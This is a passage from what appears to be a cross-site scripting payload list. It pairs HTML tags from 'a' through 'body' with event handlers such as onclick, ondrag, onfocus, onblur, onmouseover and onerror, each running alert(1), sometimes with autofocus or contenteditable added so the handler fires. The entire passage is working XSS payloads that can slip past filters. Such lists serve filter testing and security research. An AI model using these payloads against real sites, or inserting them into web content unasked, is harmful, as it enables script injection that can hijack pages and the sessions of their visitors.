ondblclick="alert(1)">test</a> <a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus> <a onkeydown="alert(1)" contenteditable>test</a> <a onkeypress="alert(1)" contenteditable>test</a> <a onkeyup="alert(1)" contenteditable>test</a> <a onmousedown="alert(1)">test</a> <a onmouseenter="alert(1)">test</a> <a onmouseleave="alert(1)">test</a> <a onmousemove="alert(1)">test</a> <a onmouseout="alert(1)">test</a> <a onmouseover="alert(1)">test</a> <a onmouseup="alert(1)">test</a> <a onpaste="alert(1)" contenteditable>test</a> <abbr draggable="true" ondrag="alert(1)">test</abbr> <abbr draggable="true" ondragend="alert(1)">test</abbr> <abbr draggable="true" ondragenter="alert(1)">test</abbr> <abbr draggable="true" ondragleave="alert(1)">test</abbr> <abbr draggable="true" ondragstart="alert(1)">test</abbr> <abbr id=x tabindex=1 onactivate=alert(1)></abbr> <abbr id=x tabindex=1 onbeforeactivate=alert(1)></abbr> <abbr id=x tabindex=1 onbeforedeactivate=alert(1)></abbr><input autofocus> <abbr id=x tabindex=1 ondeactivate=alert(1)></abbr><input id=y autofocus> <abbr id=x tabindex=1 onfocus=alert(1)></abbr> <abbr id=x tabindex=1 onfocusin=alert(1)></abbr> <abbr onbeforecopy="alert(1)" contenteditable>test</abbr> <abbr onbeforecut="alert(1)" contenteditable>test</abbr> <abbr onbeforepaste="alert(1)" contenteditable>test</abbr> <abbr onblur=alert(1) tabindex=1 id=x></abbr><input autofocus> <abbr onclick="alert(1)">test</abbr> <abbr oncontextmenu="alert(1)">test</abbr> <abbr oncopy="alert(1)" contenteditable>test</abbr> <abbr oncut="alert(1)" contenteditable>test</abbr> <abbr ondblclick="alert(1)">test</abbr> <abbr onfocusout=alert(1) tabindex=1 id=x></abbr><input autofocus> <abbr onkeydown="alert(1)" contenteditable>test</abbr> <abbr onkeypress="alert(1)" contenteditable>test</abbr> <abbr onkeyup="alert(1)" contenteditable>test</abbr> <abbr onmousedown="alert(1)">test</abbr> <abbr onmouseenter="alert(1)">test</abbr> <abbr onmouseleave="alert(1)">test</abbr> <abbr onmousemove="alert(1)">test</abbr> <abbr onmouseout="alert(1)">test</abbr> <abbr onmouseover="alert(1)">test</abbr> <abbr onmouseup="alert(1)">test</abbr> <abbr onpaste="alert(1)" contenteditable>test</abbr> <acronym draggable="true" ondrag="alert(1)">test</acronym> <acronym draggable="true" ondragend="alert(1)">test</acronym> <acronym draggable="true" ondragenter="alert(1)">test</acronym> <acronym draggable="true" ondragleave="alert(1)">test</acronym> <acronym draggable="true" ondragstart="alert(1)">test</acronym> <acronym id=x tabindex=1 onactivate=alert(1)></acronym> <acronym id=x tabindex=1 onbeforeactivate=alert(1)></acronym> <acronym id=x tabindex=1 onbeforedeactivate=alert(1)></acronym><input autofocus> <acronym id=x tabindex=1 ondeactivate=alert(1)></acronym><input id=y autofocus> <acronym id=x tabindex=1 onfocus=alert(1)></acronym> <acronym id=x tabindex=1 onfocusin=alert(1)></acronym> <acronym onbeforecopy="alert(1)" contenteditable>test</acronym> <acronym onbeforecut="alert(1)" contenteditable>test</acronym> <acronym onbeforepaste="alert(1)" contenteditable>test</acronym> <acronym onblur=alert(1) tabindex=1 id=x></acronym><input autofocus> <acronym onclick="alert(1)">test</acronym> <acronym oncontextmenu="alert(1)">test</acronym> <acronym oncopy="alert(1)" contenteditable>test</acronym> <acronym oncut="alert(1)" contenteditable>test</acronym> <acronym ondblclick="alert(1)">test</acronym> <acronym onfocusout=alert(1) tabindex=1 id=x></acronym><input autofocus> <acronym onkeydown="alert(1)" contenteditable>test</acronym> <acronym onkeypress="alert(1)" contenteditable>test</acronym> <acronym onkeyup="alert(1)" contenteditable>test</acronym> <acronym onmousedown="alert(1)">test</acronym> <acronym onmouseenter="alert(1)">test</acronym> <acronym onmouseleave="alert(1)">test</acronym> <acronym onmousemove="alert(1)">test</acronym> <acronym onmouseout="alert(1)">test</acronym> <acronym onmouseover="alert(1)">test</acronym> <acronym onmouseup="alert(1)">test</acronym> <acronym onpaste="alert(1)" contenteditable>test</acronym> <address draggable="true" ondrag="alert(1)">test</address> <address draggable="true" ondragend="alert(1)">test</address> <address draggable="true" ondragenter="alert(1)">test</address> <address draggable="true" ondragleave="alert(1)">test</address> <address draggable="true" ondragstart="alert(1)">test</address> <address id=x tabindex=1 onactivate=alert(1)></address> <address id=x tabindex=1 onbeforeactivate=alert(1)></address> <address id=x tabindex=1 onbeforedeactivate=alert(1)></address><input autofocus> <address id=x tabindex=1 ondeactivate=alert(1)></address><input id=y autofocus> <address id=x tabindex=1 onfocus=alert(1)></address> <address id=x tabindex=1 onfocusin=alert(1)></address> <address onbeforecopy="alert(1)" contenteditable>test</address> <address onbeforecut="alert(1)" contenteditable>test</address> <address onbeforepaste="alert(1)" contenteditable>test</address> <address onblur=alert(1) tabindex=1 id=x></address><input autofocus> <address onclick="alert(1)">test</address> <address oncontextmenu="alert(1)">test</address> <address oncopy="alert(1)" contenteditable>test</address> <address oncut="alert(1)" contenteditable>test</address> <address ondblclick="alert(1)">test</address> <address onfocusout=alert(1) tabindex=1 id=x></address><input autofocus> <address onkeydown="alert(1)" contenteditable>test</address> <address onkeypress="alert(1)" contenteditable>test</address> <address onkeyup="alert(1)" contenteditable>test</address> <address onmousedown="alert(1)">test</address> <address onmouseenter="alert(1)">test</address> <address onmouseleave="alert(1)">test</address> <address onmousemove="alert(1)">test</address> <address onmouseout="alert(1)">test</address> <address onmouseover="alert(1)">test</address> <address onmouseup="alert(1)">test</address> <address onpaste="alert(1)" contenteditable>test</address> <applet draggable="true" ondrag="alert(1)">test</applet> <applet draggable="true" ondragend="alert(1)">test</applet> <applet draggable="true" ondragenter="alert(1)">test</applet> <applet draggable="true" ondragleave="alert(1)">test</applet> <applet draggable="true" ondragstart="alert(1)">test</applet> <applet id=x tabindex=1 onactivate=alert(1)></applet> <applet id=x tabindex=1 onbeforeactivate=alert(1)></applet> <applet id=x tabindex=1 onbeforedeactivate=alert(1)></applet><input autofocus> <applet id=x tabindex=1 ondeactivate=alert(1)></applet><input id=y autofocus> <applet id=x tabindex=1 onfocus=alert(1)></applet> <applet id=x tabindex=1 onfocusin=alert(1)></applet> <applet onbeforecopy="alert(1)" contenteditable>test</applet> <applet onbeforecut="alert(1)" contenteditable>test</applet> <applet onbeforepaste="alert(1)" contenteditable>test</applet> <applet onblur=alert(1) tabindex=1 id=x></applet><input autofocus> <applet onclick="alert(1)">test</applet> <applet oncontextmenu="alert(1)">test</applet> <applet oncopy="alert(1)" contenteditable>test</applet> <applet oncut="alert(1)" contenteditable>test</applet> <applet ondblclick="alert(1)">test</applet> <applet onfocusout=alert(1) tabindex=1 id=x></applet><input autofocus> <applet onkeydown="alert(1)" contenteditable>test</applet> <applet onkeypress="alert(1)" contenteditable>test</applet> <applet onkeyup="alert(1)" contenteditable>test</applet> <applet onmousedown="alert(1)">test</applet> <applet onmouseenter="alert(1)">test</applet> <applet onmouseleave="alert(1)">test</applet> <applet onmousemove="alert(1)">test</applet> <applet onmouseout="alert(1)">test</applet> <applet onmouseover="alert(1)">test</applet> <applet onmouseup="alert(1)">test</applet> <applet onpaste="alert(1)" contenteditable>test</applet> <applet onreadystatechange=alert(1)></applet> <area draggable="true" ondrag="alert(1)">test</area> <area draggable="true" ondragend="alert(1)">test</area> <area draggable="true" ondragenter="alert(1)">test</area> <area draggable="true" ondragleave="alert(1)">test</area> <area draggable="true" ondragstart="alert(1)">test</area> <area id=x tabindex=1 onactivate=alert(1)></area> <area id=x tabindex=1 onbeforeactivate=alert(1)></area> <area id=x tabindex=1 onbeforedeactivate=alert(1)></area><input autofocus> <area id=x tabindex=1 ondeactivate=alert(1)></area><input id=y autofocus> <area onbeforecopy="alert(1)" contenteditable>test</area> <area onbeforecut="alert(1)" contenteditable>test</area> <area onbeforepaste="alert(1)" contenteditable>test</area> <area onblur=alert(1) tabindex=1 id=x></area><input autofocus> <area onclick="alert(1)">test</area> <area oncontextmenu="alert(1)">test</area> <area oncopy="alert(1)" contenteditable>test</area> <area oncut="alert(1)" contenteditable>test</area> <area ondblclick="alert(1)">test</area> <area onfocusout=alert(1) tabindex=1 id=x></area><input autofocus> <area onkeydown="alert(1)" contenteditable>test</area> <area onkeypress="alert(1)" contenteditable>test</area> <area onkeyup="alert(1)" contenteditable>test</area> <area onmousedown="alert(1)">test</area> <area onmouseenter="alert(1)">test</area> <area onmouseleave="alert(1)">test</area> <area onmousemove="alert(1)">test</area> <area onmouseout="alert(1)">test</area> <area onmouseover="alert(1)">test</area> <area onmouseup="alert(1)">test</area> <area onpaste="alert(1)" contenteditable>test</area> <article draggable="true" ondrag="alert(1)">test</article> <article draggable="true" ondragend="alert(1)">test</article> <article draggable="true" ondragenter="alert(1)">test</article> <article draggable="true" ondragleave="alert(1)">test</article> <article draggable="true" ondragstart="alert(1)">test</article> <article id=x tabindex=1 onactivate=alert(1)></article> <article id=x tabindex=1 onbeforeactivate=alert(1)></article> <article id=x tabindex=1 onbeforedeactivate=alert(1)></article><input autofocus> <article id=x tabindex=1 ondeactivate=alert(1)></article><input id=y autofocus> <article id=x tabindex=1 onfocus=alert(1)></article> <article id=x tabindex=1 onfocusin=alert(1)></article> <article onbeforecopy="alert(1)" contenteditable>test</article> <article onbeforecut="alert(1)" contenteditable>test</article> <article onbeforepaste="alert(1)" contenteditable>test</article> <article onblur=alert(1) tabindex=1 id=x></article><input autofocus> <article onclick="alert(1)">test</article> <article oncontextmenu="alert(1)">test</article> <article oncopy="alert(1)" contenteditable>test</article> <article oncut="alert(1)" contenteditable>test</article> <article ondblclick="alert(1)">test</article> <article onfocusout=alert(1) tabindex=1 id=x></article><input autofocus> <article onkeydown="alert(1)" contenteditable>test</article> <article onkeypress="alert(1)" contenteditable>test</article> <article onkeyup="alert(1)" contenteditable>test</article> <article onmousedown="alert(1)">test</article> <article onmouseenter="alert(1)">test</article> <article onmouseleave="alert(1)">test</article> <article onmousemove="alert(1)">test</article> <article onmouseout="alert(1)">test</article> <article onmouseover="alert(1)">test</article> <article onmouseup="alert(1)">test</article> <article onpaste="alert(1)" contenteditable>test</article> <aside draggable="true" ondrag="alert(1)">test</aside> <aside draggable="true" ondragend="alert(1)">test</aside> <aside draggable="true" ondragenter="alert(1)">test</aside> <aside draggable="true" ondragleave="alert(1)">test</aside> <aside draggable="true" ondragstart="alert(1)">test</aside> <aside id=x tabindex=1 onactivate=alert(1)></aside> <aside id=x tabindex=1 onbeforeactivate=alert(1)></aside> <aside id=x tabindex=1 onbeforedeactivate=alert(1)></aside><input autofocus> <aside id=x tabindex=1 ondeactivate=alert(1)></aside><input id=y autofocus> <aside id=x tabindex=1 onfocus=alert(1)></aside> <aside id=x tabindex=1 onfocusin=alert(1)></aside> <aside onbeforecopy="alert(1)" contenteditable>test</aside> <aside onbeforecut="alert(1)" contenteditable>test</aside> <aside onbeforepaste="alert(1)" contenteditable>test</aside> <aside onblur=alert(1) tabindex=1 id=x></aside><input autofocus> <aside onclick="alert(1)">test</aside> <aside oncontextmenu="alert(1)">test</aside> <aside oncopy="alert(1)" contenteditable>test</aside> <aside oncut="alert(1)" contenteditable>test</aside> <aside ondblclick="alert(1)">test</aside> <aside onfocusout=alert(1) tabindex=1 id=x></aside><input autofocus> <aside onkeydown="alert(1)" contenteditable>test</aside> <aside onkeypress="alert(1)" contenteditable>test</aside> <aside onkeyup="alert(1)" contenteditable>test</aside> <aside onmousedown="alert(1)">test</aside> <aside onmouseenter="alert(1)">test</aside> <aside onmouseleave="alert(1)">test</aside> <aside onmousemove="alert(1)">test</aside> <aside onmouseout="alert(1)">test</aside> <aside onmouseover="alert(1)">test</aside> <aside onmouseup="alert(1)">test</aside> <aside onpaste="alert(1)" contenteditable>test</aside> <audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> <audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> <audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio> <audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> <audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> <audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> <audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> <audio draggable="true" ondrag="alert(1)">test</audio> <audio draggable="true" ondragend="alert(1)">test</audio> <audio draggable="true" ondragenter="alert(1)">test</audio> <audio draggable="true" ondragleave="alert(1)">test</audio> <audio draggable="true" ondragstart="alert(1)">test</audio> <audio id=x controls onfocus=alert(1) id=x><source src="validaudio.wav"></audio> <audio id=x controls onfocusin=alert(1) id=x><source src="validaudio.wav"></audio> <audio id=x tabindex=1 onactivate=alert(1)></audio> <audio id=x tabindex=1 onbeforeactivate=alert(1)></audio> <audio id=x tabindex=1 onbeforedeactivate=alert(1)></audio><input autofocus> <audio id=x tabindex=1 ondeactivate=alert(1)></audio><input id=y autofocus> <audio onbeforecopy="alert(1)" contenteditable>test</audio> <audio onbeforecut="alert(1)" contenteditable>test</audio> <audio onbeforepaste="alert(1)" contenteditable>test</audio> <audio onblur=alert(1) tabindex=1 id=x></audio><input autofocus> <audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> <audio onclick="alert(1)">test</audio> <audio oncontextmenu="alert(1)">test</audio> <audio oncopy="alert(1)" contenteditable>test</audio> <audio oncut="alert(1)" contenteditable>test</audio> <audio ondblclick="alert(1)">test</audio> <audio onfocusout=alert(1) tabindex=1 id=x></audio><input autofocus> <audio onkeydown="alert(1)" contenteditable>test</audio> <audio onkeypress="alert(1)" contenteditable>test</audio> <audio onkeyup="alert(1)" contenteditable>test</audio> <audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> <audio onmousedown="alert(1)">test</audio> <audio onmouseenter="alert(1)">test</audio> <audio onmouseleave="alert(1)">test</audio> <audio onmousemove="alert(1)">test</audio> <audio onmouseout="alert(1)">test</audio> <audio onmouseover="alert(1)">test</audio> <audio onmouseup="alert(1)">test</audio> <audio onpaste="alert(1)" contenteditable>test</audio> <audio src/onerror=alert(1)> <b draggable="true" ondrag="alert(1)">test</b> <b draggable="true" ondragend="alert(1)">test</b> <b draggable="true" ondragenter="alert(1)">test</b> <b draggable="true" ondragleave="alert(1)">test</b> <b draggable="true" ondragstart="alert(1)">test</b> <b id=x tabindex=1 onactivate=alert(1)></b> <b id=x tabindex=1 onbeforeactivate=alert(1)></b> <b id=x tabindex=1 onbeforedeactivate=alert(1)></b><input autofocus> <b id=x tabindex=1 ondeactivate=alert(1)></b><input id=y autofocus> <b id=x tabindex=1 onfocus=alert(1)></b> <b id=x tabindex=1 onfocusin=alert(1)></b> <b onbeforecopy="alert(1)" contenteditable>test</b> <b onbeforecut="alert(1)" contenteditable>test</b> <b onbeforepaste="alert(1)" contenteditable>test</b> <b onblur=alert(1) tabindex=1 id=x></b><input autofocus> <b onclick="alert(1)">test</b> <b oncontextmenu="alert(1)">test</b> <b oncopy="alert(1)" contenteditable>test</b> <b oncut="alert(1)" contenteditable>test</b> <b ondblclick="alert(1)">test</b> <b onfocusout=alert(1) tabindex=1 id=x></b><input autofocus> <b onkeydown="alert(1)" contenteditable>test</b> <b onkeypress="alert(1)" contenteditable>test</b> <b onkeyup="alert(1)" contenteditable>test</b> <b onmousedown="alert(1)">test</b> <b onmouseenter="alert(1)">test</b> <b onmouseleave="alert(1)">test</b> <b onmousemove="alert(1)">test</b> <b onmouseout="alert(1)">test</b> <b onmouseover="alert(1)">test</b> <b onmouseup="alert(1)">test</b> <b onpaste="alert(1)" contenteditable>test</b> <base draggable="true" ondrag="alert(1)">test</base> <base draggable="true" ondragend="alert(1)">test</base> <base draggable="true" ondragenter="alert(1)">test</base> <base draggable="true" ondragleave="alert(1)">test</base> <base draggable="true" ondragstart="alert(1)">test</base> <base id=x tabindex=1 onactivate=alert(1)></base> <base id=x tabindex=1 onbeforeactivate=alert(1)></base> <base id=x tabindex=1 onbeforedeactivate=alert(1)></base><input autofocus> <base id=x tabindex=1 ondeactivate=alert(1)></base><input id=y autofocus> <base id=x tabindex=1 onfocus=alert(1)></base> <base id=x tabindex=1 onfocusin=alert(1)></base> <base onbeforecopy="alert(1)" contenteditable>test</base> <base onbeforecut="alert(1)" contenteditable>test</base> <base onbeforepaste="alert(1)" contenteditable>test</base> <base onblur=alert(1) tabindex=1 id=x></base><input autofocus> <base onclick="alert(1)">test</base> <base oncontextmenu="alert(1)">test</base> <base oncopy="alert(1)" contenteditable>test</base> <base oncut="alert(1)" contenteditable>test</base> <base ondblclick="alert(1)">test</base> <base onfocusout=alert(1) tabindex=1 id=x></base><input autofocus> <base onkeydown="alert(1)" contenteditable>test</base> <base onkeypress="alert(1)" contenteditable>test</base> <base onkeyup="alert(1)" contenteditable>test</base> <base onmousedown="alert(1)">test</base> <base onmouseenter="alert(1)">test</base> <base onmouseleave="alert(1)">test</base> <base onmousemove="alert(1)">test</base> <base onmouseout="alert(1)">test</base> <base onmouseover="alert(1)">test</base> <base onmouseup="alert(1)">test</base> <base onpaste="alert(1)" contenteditable>test</base> <basefont draggable="true" ondrag="alert(1)">test</basefont> <basefont draggable="true" ondragend="alert(1)">test</basefont> <basefont draggable="true" ondragenter="alert(1)">test</basefont> <basefont draggable="true" ondragleave="alert(1)">test</basefont> <basefont draggable="true" ondragstart="alert(1)">test</basefont> <basefont id=x tabindex=1 onactivate=alert(1)></basefont> <basefont id=x tabindex=1 onbeforeactivate=alert(1)></basefont> <basefont id=x tabindex=1 onbeforedeactivate=alert(1)></basefont><input autofocus> <basefont id=x tabindex=1 ondeactivate=alert(1)></basefont><input id=y autofocus> <basefont id=x tabindex=1 onfocus=alert(1)></basefont> <basefont id=x tabindex=1 onfocusin=alert(1)></basefont> <basefont onbeforecopy="alert(1)" contenteditable>test</basefont> <basefont onbeforecut="alert(1)" contenteditable>test</basefont> <basefont onbeforepaste="alert(1)" contenteditable>test</basefont> <basefont onblur=alert(1) tabindex=1 id=x></basefont><input autofocus> <basefont onclick="alert(1)">test</basefont> <basefont oncontextmenu="alert(1)">test</basefont> <basefont oncopy="alert(1)" contenteditable>test</basefont> <basefont oncut="alert(1)" contenteditable>test</basefont> <basefont ondblclick="alert(1)">test</basefont> <basefont onfocusout=alert(1) tabindex=1 id=x></basefont><input autofocus> <basefont onkeydown="alert(1)" contenteditable>test</basefont> <basefont onkeypress="alert(1)" contenteditable>test</basefont> <basefont onkeyup="alert(1)" contenteditable>test</basefont> <basefont onmousedown="alert(1)">test</basefont> <basefont onmouseenter="alert(1)">test</basefont> <basefont onmouseleave="alert(1)">test</basefont> <basefont onmousemove="alert(1)">test</basefont> <basefont onmouseout="alert(1)">test</basefont> <basefont onmouseover="alert(1)">test</basefont> <basefont onmouseup="alert(1)">test</basefont> <basefont onpaste="alert(1)" contenteditable>test</basefont> <bdi draggable="true" ondrag="alert(1)">test</bdi> <bdi draggable="true" ondragend="alert(1)">test</bdi> <bdi draggable="true" ondragenter="alert(1)">test</bdi> <bdi draggable="true" ondragleave="alert(1)">test</bdi> <bdi draggable="true" ondragstart="alert(1)">test</bdi> <bdi id=x tabindex=1 onactivate=alert(1)></bdi> <bdi id=x tabindex=1 onbeforeactivate=alert(1)></bdi> <bdi id=x tabindex=1 onbeforedeactivate=alert(1)></bdi><input autofocus> <bdi id=x tabindex=1 ondeactivate=alert(1)></bdi><input id=y autofocus> <bdi id=x tabindex=1 onfocus=alert(1)></bdi> <bdi id=x tabindex=1 onfocusin=alert(1)></bdi> <bdi onbeforecopy="alert(1)" contenteditable>test</bdi> <bdi onbeforecut="alert(1)" contenteditable>test</bdi> <bdi onbeforepaste="alert(1)" contenteditable>test</bdi> <bdi onblur=alert(1) tabindex=1 id=x></bdi><input autofocus> <bdi onclick="alert(1)">test</bdi> <bdi oncontextmenu="alert(1)">test</bdi> <bdi oncopy="alert(1)" contenteditable>test</bdi> <bdi oncut="alert(1)" contenteditable>test</bdi> <bdi ondblclick="alert(1)">test</bdi> <bdi onfocusout=alert(1) tabindex=1 id=x></bdi><input autofocus> <bdi onkeydown="alert(1)" contenteditable>test</bdi> <bdi onkeypress="alert(1)" contenteditable>test</bdi> <bdi onkeyup="alert(1)" contenteditable>test</bdi> <bdi onmousedown="alert(1)">test</bdi> <bdi onmouseenter="alert(1)">test</bdi> <bdi onmouseleave="alert(1)">test</bdi> <bdi onmousemove="alert(1)">test</bdi> <bdi onmouseout="alert(1)">test</bdi> <bdi onmouseover="alert(1)">test</bdi> <bdi onmouseup="alert(1)">test</bdi> <bdi onpaste="alert(1)" contenteditable>test</bdi> <bdo draggable="true" ondrag="alert(1)">test</bdo> <bdo draggable="true" ondragend="alert(1)">test</bdo> <bdo draggable="true" ondragenter="alert(1)">test</bdo> <bdo draggable="true" ondragleave="alert(1)">test</bdo> <bdo draggable="true" ondragstart="alert(1)">test</bdo> <bdo id=x tabindex=1 onactivate=alert(1)></bdo> <bdo id=x tabindex=1 onbeforeactivate=alert(1)></bdo> <bdo id=x tabindex=1 onbeforedeactivate=alert(1)></bdo><input autofocus> <bdo id=x tabindex=1 ondeactivate=alert(1)></bdo><input id=y autofocus> <bdo id=x tabindex=1 onfocus=alert(1)></bdo> <bdo id=x tabindex=1 onfocusin=alert(1)></bdo> <bdo onbeforecopy="alert(1)" contenteditable>test</bdo> <bdo onbeforecut="alert(1)" contenteditable>test</bdo> <bdo onbeforepaste="alert(1)" contenteditable>test</bdo> <bdo onblur=alert(1) tabindex=1 id=x></bdo><input autofocus> <bdo onclick="alert(1)">test</bdo> <bdo oncontextmenu="alert(1)">test</bdo> <bdo oncopy="alert(1)" contenteditable>test</bdo> <bdo oncut="alert(1)" contenteditable>test</bdo> <bdo ondblclick="alert(1)">test</bdo> <bdo onfocusout=alert(1) tabindex=1 id=x></bdo><input autofocus> <bdo onkeydown="alert(1)" contenteditable>test</bdo> <bdo onkeypress="alert(1)" contenteditable>test</bdo> <bdo onkeyup="alert(1)" contenteditable>test</bdo> <bdo onmousedown="alert(1)">test</bdo> <bdo onmouseenter="alert(1)">test</bdo> <bdo onmouseleave="alert(1)">test</bdo> <bdo onmousemove="alert(1)">test</bdo> <bdo onmouseout="alert(1)">test</bdo> <bdo onmouseover="alert(1)">test</bdo> <bdo onmouseup="alert(1)">test</bdo> <bdo onpaste="alert(1)" contenteditable>test</bdo> <bgsound draggable="true" ondrag="alert(1)">test</bgsound> <bgsound draggable="true" ondragend="alert(1)">test</bgsound> <bgsound draggable="true" ondragenter="alert(1)">test</bgsound> <bgsound draggable="true" ondragleave="alert(1)">test</bgsound> <bgsound draggable="true" ondragstart="alert(1)">test</bgsound> <bgsound id=x tabindex=1 onactivate=alert(1)></bgsound> <bgsound id=x tabindex=1 onbeforeactivate=alert(1)></bgsound> <bgsound id=x tabindex=1 onbeforedeactivate=alert(1)></bgsound><input autofocus> <bgsound id=x tabindex=1 ondeactivate=alert(1)></bgsound><input id=y autofocus> <bgsound id=x tabindex=1 onfocus=alert(1)></bgsound> <bgsound id=x tabindex=1 onfocusin=alert(1)></bgsound> <bgsound onbeforecopy="alert(1)" contenteditable>test</bgsound> <bgsound onbeforecut="alert(1)" contenteditable>test</bgsound> <bgsound onbeforepaste="alert(1)" contenteditable>test</bgsound> <bgsound onblur=alert(1) tabindex=1 id=x></bgsound><input autofocus> <bgsound onclick="alert(1)">test</bgsound> <bgsound oncontextmenu="alert(1)">test</bgsound> <bgsound oncopy="alert(1)" contenteditable>test</bgsound> <bgsound oncut="alert(1)" contenteditable>test</bgsound> <bgsound ondblclick="alert(1)">test</bgsound> <bgsound onfocusout=alert(1) tabindex=1 id=x></bgsound><input autofocus> <bgsound onkeydown="alert(1)" contenteditable>test</bgsound> <bgsound onkeypress="alert(1)" contenteditable>test</bgsound> <bgsound onkeyup="alert(1)" contenteditable>test</bgsound> <bgsound onmousedown="alert(1)">test</bgsound> <bgsound onmouseenter="alert(1)">test</bgsound> <bgsound onmouseleave="alert(1)">test</bgsound> <bgsound onmousemove="alert(1)">test</bgsound> <bgsound onmouseout="alert(1)">test</bgsound> <bgsound onmouseover="alert(1)">test</bgsound> <bgsound onmouseup="alert(1)">test</bgsound> <bgsound onpaste="alert(1)" contenteditable>test</bgsound> <big draggable="true" ondrag="alert(1)">test</big> <big draggable="true" ondragend="alert(1)">test</big> <big draggable="true" ondragenter="alert(1)">test</big> <big draggable="true" ondragleave="alert(1)">test</big> <big draggable="true" ondragstart="alert(1)">test</big> <big id=x tabindex=1 onactivate=alert(1)></big> <big id=x tabindex=1 onbeforeactivate=alert(1)></big> <big id=x tabindex=1 onbeforedeactivate=alert(1)></big><input autofocus> <big id=x tabindex=1 ondeactivate=alert(1)></big><input id=y autofocus> <big id=x tabindex=1 onfocus=alert(1)></big> <big id=x tabindex=1 onfocusin=alert(1)></big> <big onbeforecopy="alert(1)" contenteditable>test</big> <big onbeforecut="alert(1)" contenteditable>test</big> <big onbeforepaste="alert(1)" contenteditable>test</big> <big onblur=alert(1) tabindex=1 id=x></big><input autofocus> <big onclick="alert(1)">test</big> <big oncontextmenu="alert(1)">test</big> <big oncopy="alert(1)" contenteditable>test</big> <big oncut="alert(1)" contenteditable>test</big> <big ondblclick="alert(1)">test</big> <big onfocusout=alert(1) tabindex=1 id=x></big><input autofocus> <big onkeydown="alert(1)" contenteditable>test</big> <big onkeypress="alert(1)" contenteditable>test</big> <big onkeyup="alert(1)" contenteditable>test</big> <big onmousedown="alert(1)">test</big> <big onmouseenter="alert(1)">test</big> <big onmouseleave="alert(1)">test</big> <big onmousemove="alert(1)">test</big> <big onmouseout="alert(1)">test</big> <big onmouseover="alert(1)">test</big> <big onmouseup="alert(1)">test</big> <big onpaste="alert(1)" contenteditable>test</big> <blink draggable="true" ondrag="alert(1)">test</blink> <blink draggable="true" ondragend="alert(1)">test</blink> <blink draggable="true" ondragenter="alert(1)">test</blink> <blink draggable="true" ondragleave="alert(1)">test</blink> <blink draggable="true" ondragstart="alert(1)">test</blink> <blink id=x tabindex=1 onactivate=alert(1)></blink> <blink id=x tabindex=1 onbeforeactivate=alert(1)></blink> <blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus> <blink id=x tabindex=1 ondeactivate=alert(1)></blink><input id=y autofocus> <blink id=x tabindex=1 onfocus=alert(1)></blink> <blink id=x tabindex=1 onfocusin=alert(1)></blink> <blink onbeforecopy="alert(1)" contenteditable>test</blink> <blink onbeforecut="alert(1)" contenteditable>test</blink> <blink onbeforepaste="alert(1)" contenteditable>test</blink> <blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus> <blink onclick="alert(1)">test</blink> <blink oncontextmenu="alert(1)">test</blink> <blink oncopy="alert(1)" contenteditable>test</blink> <blink oncut="alert(1)" contenteditable>test</blink> <blink ondblclick="alert(1)">test</blink> <blink onfocusout=alert(1) tabindex=1 id=x></blink><input autofocus> <blink onkeydown="alert(1)" contenteditable>test</blink> <blink onkeypress="alert(1)" contenteditable>test</blink> <blink onkeyup="alert(1)" contenteditable>test</blink> <blink onmousedown="alert(1)">test</blink> <blink onmouseenter="alert(1)">test</blink> <blink onmouseleave="alert(1)">test</blink> <blink onmousemove="alert(1)">test</blink> <blink onmouseout="alert(1)">test</blink> <blink onmouseover="alert(1)">test</blink> <blink onmouseup="alert(1)">test</blink> <blink onpaste="alert(1)" contenteditable>test</blink> <blockquote draggable="true" ondrag="alert(1)">test</blockquote> <blockquote draggable="true" ondragend="alert(1)">test</blockquote> <blockquote draggable="true" ondragenter="alert(1)">test</blockquote> <blockquote draggable="true" ondragleave="alert(1)">test</blockquote> <blockquote draggable="true" ondragstart="alert(1)">test</blockquote> <blockquote id=x tabindex=1 onactivate=alert(1)></blockquote> <blockquote id=x tabindex=1 onbeforeactivate=alert(1)></blockquote> <blockquote id=x tabindex=1 onbeforedeactivate=alert(1)></blockquote><input autofocus> <blockquote id=x tabindex=1 ondeactivate=alert(1)></blockquote><input id=y autofocus> <blockquote id=x tabindex=1 onfocus=alert(1)></blockquote> <blockquote id=x tabindex=1 onfocusin=alert(1)></blockquote> <blockquote onbeforecopy="alert(1)" contenteditable>test</blockquote> <blockquote onbeforecut="alert(1)" contenteditable>test</blockquote> <blockquote onbeforepaste="alert(1)" contenteditable>test</blockquote> <blockquote onblur=alert(1) tabindex=1 id=x></blockquote><input autofocus> <blockquote onclick="alert(1)">test</blockquote> <blockquote oncontextmenu="alert(1)">test</blockquote> <blockquote oncopy="alert(1)" contenteditable>test</blockquote> <blockquote oncut="alert(1)" contenteditable>test</blockquote> <blockquote ondblclick="alert(1)">test</blockquote> <blockquote onfocusout=alert(1) tabindex=1 id=x></blockquote><input autofocus> <blockquote onkeydown="alert(1)" contenteditable>test</blockquote> <blockquote onkeypress="alert(1)" contenteditable>test</blockquote> <blockquote onkeyup="alert(1)" contenteditable>test</blockquote> <blockquote onmousedown="alert(1)">test</blockquote> <blockquote onmouseenter="alert(1)">test</blockquote> <blockquote onmouseleave="alert(1)">test</blockquote> <blockquote onmousemove="alert(1)">test</blockquote> <blockquote onmouseout="alert(1)">test</blockquote> <blockquote onmouseover="alert(1)">test</blockquote> <blockquote onmouseup="alert(1)">test</blockquote> <blockquote onpaste="alert(1)" contenteditable>test</blockquote> <body draggable="true" ondrag="alert(1)">test</body> <body draggable="true" ondragend="alert(1)">test</body> <body draggable="true" ondragenter="alert(1)">test</body> <body draggable="true" ondragleave="alert(1)">test</body> <body draggable="true" ondragstart="alert(1)">test</body> <body id=x 